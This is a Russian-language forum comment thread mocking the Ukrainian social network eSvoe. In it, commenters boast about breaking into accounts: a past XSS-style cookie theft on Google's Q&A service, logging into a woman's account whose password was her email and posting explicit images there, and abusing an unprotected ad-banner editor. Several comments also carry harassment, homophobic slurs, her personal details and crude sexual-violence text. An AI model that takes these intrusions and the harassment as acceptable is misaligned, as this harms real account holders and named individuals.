                Пять лет назад мною был взломан ныне закрытый сервис вопросов и ответов от "Google" (http://otvety.google.ru). Уязвимость заключалась в обработке сохранённых на сервере данных от клиента JS-скриптом без экранирования спецсимволов вроде одинарной кавычки. Были взломаны сотни аккаунтов, в том числе и администраторский (оказалось, что у "cookies" отсутствовал флаг "HttpOnly", а сессии не привязывались к IP-адресу).
                Это была "Java". Это была неведомая невъебенная высоконагруженная БД (по некоторым предположениям, "PostgreSQL"). Наконец, это был "Google".
                Долбоёбов хватает везде, какими бы технологиями они не пользовались.
                Ответить
      • Всем бы было хорошо это видео, да только кого интересует, с кем и в какие дыры Леська трахается?
        Ответить
    • Пока я, как идиот, искал уязвимости и изучал все поддомены сайта, обладатели более живого ума сделали более простое и от этого гениальное открытие - пароль к официальному аккаунту Леськи в "eSvoe" (https://esvoe.com/strumchinska) совпадал с адресом электронной почты. Добрые люди решили помочь мне познакомить общественность с боди-артом и разместили в профиле фотографии весьма прелюбопытнейшего содержания. Мне, как первопроходцу, воздали должное и в обложку поместили найденную мною инсталляцию из трёх геев, подписав её.

      P.S.: Сам я войти уже не успел - какие-то шалуны сменили пароль.
      P.P.S.: Леська проспалась.
      Ответить
      • > Дата народження: 1995-04-22

        Вот сучка!
        Ответить
        • Ленин родился 22 апреля
          Ответить
          • Родился Ленин в солнечном апреле,
            Когда звенела музыкой капель.
            И землю нашу сделали добрее
            Апрель и Ленин, Ленин и апрель.
            Ответить
            • И Гитлер родился в апреле
              Ответить
              • Да вообще расплодились тут:
                https://ru.wikipedia.org/wiki/Категория:Родившиеся_22_апреля
                Ответить
                • возможно скоро вылезет на броневик, и речь толкнет
                  Ответить
      • Не успел зарегаться, как мне какие-то боты-хацкеры дружбу предлагают.

        P.S. Какой у тебя акк? Хочу подписаться на тебя.
        Ответить
        • Нет смысла - я там не активничаю.
          Ответить
          • Конечно
            Ты же пассив
            Ответить
          • Как это не активничаешь? А постит фоточки кто?
            Ответить
            • Но использующиеся для этого аккаунты я периодически меняю, так что подписываться не на кого и не на что.
              Ответить
    • https://add.esvoe.com

      Тем временем, в их баннерной сети полностью отсутствует фильтрация доступа к редактированию чужих рекламных баннеров, что открывает нам широкие возможности по взращиванию в обществе любви к красоте мужского тела.
      Ответить
      • Пофиксили. Теперь там SSL_ERROR_RX_RECORD_TOO_LONG
        Ответить
        • Не "пофиксили", а как попало закрыли, лишь бы быстрее закрыть.
          Ответить
          • привет! команда "разработчиков" соцсети есвое (имхо в к-ве 1 человека) уже читают эту портянку, так что рекомендую вам не рассказывать КАК вы это делаете, что бы не помогать секте свидетелей Струмчинской развивать сей "проект"
            Ответить
            • Я тоже думаю - лучше по факту и после исчезновения очередной дыры.
              Ответить
        • > SSL_ERROR_RX_RECORD_TOO_LONG

          У меня такую же ошибку пару дней назад выдавали Яндекс, mail.ru, Гугл, ВК, Твиттер — да вообще куча известных сервисов. Причём через пару часов ошибка исчезла.

          Что это было, я так и не понял. Может быть, провайдер хотел взломать зашифрованный канал?
          Ответить
      • вчера, перед полночью узнал одну хорошую новость, оказывается список соцсетей, к-во подпижжиков на которых составляло от 20 тысяч и выше (их примерно десяток), которые работают на vii engine кто-то взломал. используюя те же ошибки. не знаешь кто? ))))))))
        Ответить
      • https://add.esvoe.com/admin

        Ожило.
        Ответить
    • ВНЕЗАПНО: http://www.esvoe.at/

      Der eSport Verband Österreich ist operativer Partner der eBundesliga.
      Ответить
    • Тем временем, как выяснилось, инноваторы, гении и специалисты по безопасности ещё две недели назад выложили движок сети со всеми своими модификациями на "GitHub".

      https://github.com/esvoe/esvoe.com
      https://github.com/esvoe/esvoe.com/search?utf8=%E2%9C%93&q=esvoe
      Ответить
      • https://github.com/esvoe/esvoe.com/commit/bbe9c5d2f948f7cdada20bcc77cac59e5051f774
        Ольга
        - <span>
        - набрала 53 очки у


        Верстуны еще заценят как модно чуваки мешают сеточку бутстрапа (col-xs-12 col-md-5") с height: 361px">

        >> composer update
        >> /usr/www/dev.esvoe.com/public"

        в 2017 году люди используют докер обычно, а не пишут вручную /usr/www, ох
        Ответить
    • камрады запилили некислую статью про єсвоє
      наконец-то правда http://mc.today/ocherednuyu-ukrainskuyu-sotsset-na-dvizhke-za-45-vzlomali-investor-proekta-ranee-zanimalsya-onlajn-kazino/
      Ответить
      • # скриншот с форума программистов

        Ну очешуеть теперь, ГКшечка форум программистов
        Ответить
        • Дилетанты нередко так называют анимешные форумы.
          Ответить
          • Йоу, пыхомакаки!
            Я Наруто Удзумаки!

            Раунд.
            Ответить
            • Анимешник хуже пхпаса
              Ответить
              • Как что-то плохое. ПХП – современный надежный высокопроизводительный шаблонизатор высокоуровневый язык программирования, а аниме – жемчужина восточноазиатской мультипликации.
                Ответить
              • Чаще всего анимешник - это крестоблядь.
                Ответить
                • Нет. Бывает анимешник 1сник
                  Ответить
                  • Но как, Шерлок? Анимешники же не выходят из дома и не представляют, что такое деньги.
                    Ответить
                    • Это хикки не выходят.

                      А бывают не настоящие анимешники, а ванаби. Понимаешь?
                      Ответить
      • Посадют теперь страйкера на бутылку за организацию хакерского притона.

        «Нам насрати на нижчі істоти!» - пролунав пронизливий голос з боку параші.

        Але пацани, як завжди, не звернули уваги на це верескливе кукурікання. Нехай кукурікає, що з нього взяти?

        Півень - не людина, і сьогодні йому належить дуже важка ніч. У нього вже протягом півтора року кожна ніч була дуже важкою, і тепер його анус був розроблений настільки, що він без проблем міг заховати в ньому цілий шмат сала.
        Ответить
      • Надо ihno рассказать что он круто йхакер
        http://mc.today/wp-content/uploads/2017/10/Govnokod-23357-PHP-Govnokod.ru-1-1000x164.png
        Ответить
        • О_о

          За мной уже выехали?
          Ответить
          • Ты попал в заголовки ведущих СМИ просто.
            Скоро у тебя будут брать интервью как у специалиста по кибербезопасности
            Ответить
          • UBERFSB ))))))))))
            Ответить
      • Что-то поздно очко взыграло. Две недели ждал, когда хоть какое-нибудь СМИ опозорит говносеть. Только забыл - и вот оно.
        Ответить
        • Кроме тебя, много ещё хакиров работало?
          Ответить
          • Никто.
            Ответить
            • пздж, чуть больше 20 человек на самом деле ковырялись параллельно тебе на сайте, в основном когда говнокошель прикрутили, просто у тебя все пафосно, устроил на єсвоє гэйпарад ))))) азаз

              было бы разумно дать отдышаться проекту, выйти из бэты (хотя врятли это произойдет), и потом хорошенько выебать, когда там уже лям народа (чего тоже не произойдет), а уже как - это интересный вопрос, поднасрать в соцсети самой же соцсети способов кульных тыща.

              имхо если бы этот сайт выжил, это было бы отличное место для сбора процентной статистики дебилов на территории Уа.

              лучший план - полный концертный зал "квартала" за счет оленечукчи, но это исключительно имхо.
              Ответить
              • Квартал это типа наших уральских пельменей?
                Ответить
                • Ага. Только уральские обычно не лезут в политоту.
                  Ответить
      • > «Кто-то использовал обычное бета-тестирование, чтобы пропиарить себя как крутого хакера»

        анонимусам крайне важен пиар, ага
        Ответить
        • Судя по всему, в данном случае кто-то хотел пропиарить эндоскопы.

          https://www.accessdata.fda.gov/cdrh_docs/pdf14/K143556.pdf

          Fujifilm Double Balloon Endoscopes
          Model EN-530T
          This device is intended for the visualization of the
          upper and lower digestive tracts. Specifically, for
          the observation, diagnosis, and endoscopic
          treatment of the esophagus, stomach, duodenum,
          small intestine, large intestine and rectum.
          Insertion route: Per oral or trans anal.

          Ради этого и использовали обычное бета-тестирование.
          Ответить
        • > анонимусам крайне важен пиар
          Анонимус, как хайвмайнд в целом, не против попиариться.
          Ответить
          • > Хакерская группа Anonymous объявила войну центробанкам мира
            https://geektimes.ru/post/275404/
            > Хакерская группа Anonymous объявила войну правительству Гонконга
            http://d-russia.ru/anonymous-obyavili-vojnu-pravitelstvu-gonkonga.html
            > Хакерская группа Anonymous объявила войну банкам Хорватии
            http://www.senica.ru/balkans/news/khakery-anonymous-nachali-ataki-na-khorvatskie-banki
            > Хакерская группа Anonymous объявила войну Северной Корее
            https://news.vse42.ru/feed/show/id/835002
            > Хакерская группа Anonymous объявила войну ИГИЛ
            https://tvzvezda.ru/news/vstrane_i_mire/content/201511171456-y46f.htm
            > Хакерская группа Anonymous объявила войну Дональду Трампу
            http://quibbll.com/27231-hakerskaya-gruppa-anonymous-obyavila-vojnu-donaldu-trampu/
            > Хакерская группа Anonymous объявила войну ЄСВОЄ
            http://mc.today/ocherednuyu-ukrainskuyu-sotsset-na-dvizhke-za-45-vzlomali-investor-proekta-ranee-zanimalsya-onlajn-kazino/
            Ответить
      • #УСПЕХ
        Ответить

    Добавить комментарий